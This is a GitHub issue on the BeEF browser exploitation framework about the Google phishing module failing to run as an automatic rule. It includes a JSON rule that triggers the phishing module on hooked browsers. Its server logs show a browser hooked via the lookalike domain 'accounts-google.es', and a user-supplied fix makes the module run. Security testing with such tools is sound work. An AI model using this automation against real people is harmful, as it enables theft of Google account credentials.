beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com

Google Phishing module doesn't execute properly as an ARE Rule #3073

Open jme418 opened 6 months ago

jme418 commented 6 months ago

First Steps

  - BeEF Version: 0.5.4.0
  - Ruby Version: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
  - Browser Details (e.g. Chrome v81.0): Causing problems with all I've tried (FF - 115.8.0esr, O - 108.0.5067.29, C - 123.0.6312.86, 123.0.6312.58, 121.0.6167.178)
  - Operating System: Linux, Windows and Android

Configuration

  1. Have you made any changes to your BeEF configuration? Yes.
  2. Have you enabled or disabled any BeEF extensions? Yes, the Metasploit one, but I do not remember if there were any others; I've been using BeEF for a while.

Steps to Reproduce

  1. Creation of beef/arerules/enabled/gmail_phishing.json

```json
{
  "name": "Google Phishing",
  "author": "jking",
  "modules": [
    {
      "name": "gmail_phishing",
      "condition": null,
      "code": null,
      "options": {
        "xss_hook_url": "https://myaccount.google.com/",
        "logout_gmail_interval": 10000,
        "wait_seconds_before_redirect": 1000
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
}
```

  2. Starting of beef and loading of the arerules.

```
msf6 > sudo ./beef -x
[*] exec: sudo ./beef -x

...

[22:46:45][*] [ARE] Ruleset (Fingerprint Browser) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Get Geolocation HTML5 (jking)) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Google Phishing) parsed and stored successfully.
[22:46:45][*] BeEF server started (press control+c to stop)
[22:47:27][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[22:47:27][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
[22:47:27][*] New Hooked Browser [id:1, ip:87.223.76.77, browser:UNKNOWN-124.0.0.0, os:Windows-10], hooked domain [accounts-google.es:443]
[22:47:27][*] [ARE] Checking if any defined rules should be triggered on target.
[22:47:27]    |_  Hooked browser and OS match rule: Fingerprint Browser.
[22:47:27]    |_  Hooked browser and OS match rule: Get Geolocation HTML5 (jking).
[22:47:27]    |_  Hooked browser and OS match rule: Google Phishing.
[22:47:27]    |_  Found [3/3] ARE rules matching the hooked browser.
[22:47:27]    |_  Preparing JS for command id [1], module [fingerprint_browser]
[22:47:27]    |_  Triggering rules [1, 2, 3] on HB 1
[22:47:28]    |_  Preparing JS for command id [2], module [get_geolocation_html5_jking]
[22:47:28]    |_  Triggering rules [1, 2, 3] on HB 1
[22:47:28]    |_  Preparing JS for command id [3], module [gmail_phishing]
[22:47:28]    |_  Triggering rules [1, 2, 3] on HB 1
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:2, mod: 290, name:'Get Geolocation HTML5 (jking)']
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:1, mod: 291, name:'Fingerprint Browser']
```

  3. The hooked host view is empty and the panel shows that the command has been executed???

  4. When re-executing the command, it shows properly.

Any clue about what is happening here? Thanks.

github-actions[bot] commented 6 months ago

This issue has been marked as stale due to inactivity and will be closed in 7 days.

stephenakq commented 5 months ago

Thank you @jme418. We'll add to our backlog.

jme418 commented 5 months ago

> Thank you @jme418. We'll add to our backlog.

Hi there! I got the solution a few hours ago. It's simple: all the functions visible in the command.js file must be placed within `beef.execute(function(){/* code here */})`. So, instead of separate calls to logoutGoogle(), displayingPhisingSite()... the associated code for those functions must take place within this function block.